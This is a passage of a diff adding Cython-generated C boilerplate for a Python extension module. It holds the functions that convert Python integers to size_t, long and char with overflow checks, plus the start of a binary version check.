(size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 2 * PyLong_SHIFT)) { + return (long) (((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 3 * PyLong_SHIFT)) { + return (long) (((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) >= 4 * PyLong_SHIFT)) { + return (long) (((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(long) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(long) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(long) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + return (long) ((((((long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(long) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(long) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + return (long) ((((((((long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(long) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) (((long)-1)*(((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(long) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(long, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(long) - 1 > 4 * PyLong_SHIFT)) { + return (long) ((((((((((long)digits[3]) << PyLong_SHIFT) | (long)digits[2]) << PyLong_SHIFT) | (long)digits[1]) << PyLong_SHIFT) | (long)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(long) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(long, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(long) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(long, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + long val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (long) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (long) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (long) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (long) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (long) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(long) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(long) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((long) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((long) 1) << (sizeof(long) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (long) -1; + } + } else { + long val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (long) -1; + val = __Pyx_PyInt_As_long(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to long"); + return (long) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to long"); + return (long) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE char __Pyx_PyInt_As_char(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const char neg_one = (char) -1, const_zero = (char) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(char) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(char, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (char) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 2 * PyLong_SHIFT)) { + return (char) (((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 3 * PyLong_SHIFT)) { + return (char) (((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) >= 4 * PyLong_SHIFT)) { + return (char) (((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(char) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(char, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(char) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(char) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + return (char) ((((((char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(char) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(char) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + return (char) ((((((((char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(char) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) (((char)-1)*(((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(char) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(char, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) ((((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(char) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + char val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (char) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (char) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (char) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (char) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(char) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(char) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((char) 1) << (sizeof(char) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (char) -1; + } + } else { + char val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (char) -1; + val = __Pyx_PyInt_As_char(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to char"); + return (char) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to char"); + return (char) -1; +} + +/* FormatTypeName */ + #if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name_2); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__84)); + } + return name; +} +#endif + +/* CheckBinaryVersion */ + static int __Pyx_check_binary_version(void) { + char ctversion[5]; + int same=1, i, found_dot; + const char* rt_from_call = Py_GetVersion(); + PyOS_snprintf(ctversion, 5, "%d.%d", PY_MAJOR_VERSION, PY_MINOR_VERSION); + found_dot = 0; + for (i = 0; i < 4; i++) { + if (!ctversion[i]) { + same = (rt_from_call[i] < '0' || rt_from_call[i] > '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return 